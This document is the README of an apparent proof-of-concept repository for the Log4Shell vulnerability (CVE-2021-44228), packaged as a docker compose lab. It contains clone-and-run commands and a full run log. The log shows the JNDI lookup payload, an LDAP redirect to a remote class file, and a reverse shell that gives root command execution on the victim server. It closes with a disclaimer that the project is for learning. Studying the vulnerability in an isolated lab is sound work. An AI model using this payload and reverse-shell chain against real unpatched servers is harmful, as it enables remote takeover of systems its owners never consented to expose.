This is a self-contained lab environment that runs the exploit safely, all from docker compose.
The affected versions are Apache Log4j <=2.0–2.14.1 and the CVE is tracked as CVE-2021-44228 (CVSS score: 10.0).
This code requires Docker and Docker Compose.
Dockerfile
and docker-compose.yml
files are self-explanatory to build and start the lab environment.
Victim server log4shell-server is built using spring initializr demo project, including Log4j 2.14.1 vulnerable version through spring-boot-starter-log4j2 2.6.1.
The vulnerable code is located inside DemoApplication.java.
Remote Code Execution is served by the rce-server.
Intermediate LDAP server is based on Java Unmarshaller Security - Turning your data into code execution.
Attack vector is performed from this script to setup a connection to the reverse-shell server.
Reverse-shell server waits for a connection, and sends a command example echo $(whoami)
through the reverse shell, which is executed on the victim server log4shell-server.
git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
ldap-server | Listening on 0.0.0.0:1389
LDAP server ready and listening.
reverse-shell | listening on [::]:4242 ...
Reverse-shell server ready and listening.
log4shell-server |
log4shell-server | . ____ _ __ _ _
log4shell-server | /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
log4shell-server | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server | \\/ ___)| |_)| | | | | || (_| | ) ) ) )
log4shell-server | ' |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server | =========|_|==============|___/=/_/_/_/
log4shell-server | :: Spring Boot :: (v2.6.1)
log4shell-server |
log4shell-server | 2021-12-18 12:31:37.695 INFO 1 --- [ main] c.e.d.DemoApplication : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server | 2021-12-18 12:31:37.739 INFO 1 --- [ main] c.e.d.DemoApplication : No active profile set, falling back to default profiles: default
log4shell-server | 2021-12-18 12:31:42.337 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
log4shell-server | 2021-12-18 12:31:42.439 INFO 1 --- [ main] o.a.c.c.StandardService : Starting service [Tomcat]
log4shell-server | 2021-12-18 12:31:42.440 INFO 1 --- [ main] o.a.c.c.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server | 2021-12-18 12:31:42.717 INFO 1 --- [ main] o.a.c.c.C.[.[.[/] : Initializing Spring embedded WebApplicationContext
log4shell-server | 2021-12-18 12:31:42.718 INFO 1 --- [ main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server | 2021-12-18 12:31:44.660 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
Vulnerable server ready and listening.
attack-vector | 👌 log4shell-server:8080 is listening!
attack-vector | 🚀 Sending attack vector ...
Attack server waiting connection and sending the attack-vector.
log4shell-server | 2021-12-18 12:31:44.740 INFO 1 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/] : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Initializing Servlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.112 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 2 ms
ldap-server | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"
Vulnerable server executing request, logging it, so LDAP server is requesting RCE to the RCE server.
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell | 👻 Hello from the log4shell-server! We are root.
reverse-shell | listening on [::]:4242 ...
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)
RCE is executed and victim server is opening the reverse shell, and reverse-shell server is able to execute execute distant commands.
log4shell-server | 2021-12-18 12:31:45.187 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello param:name: ReverseShell@22fb868
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:host: log4shell-server:8080
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:user-agent: curl/7.80.0
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:accept: */*
Victim server is logging the attack vector request.
attack-vector | 🔥 Server returned:
attack-vector | > HTTP/1.1 200
attack-vector | > Content-Type: text/plain;charset=UTF-8
attack-vector | > Content-Length: 52
attack-vector | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector | >
attack-vector | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector | Attack should be successfull, have a nice day!
Attack vector request is logging the response, and leaves the party.
This repository is only about learning from the vulnerability.
The project is not intended to be and cannot be used as a malicious exploit of the CVE-2021-44228 without the consentment of victim server's owner.
Any usage for malicious activity is prohibited and punished by severe laws.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/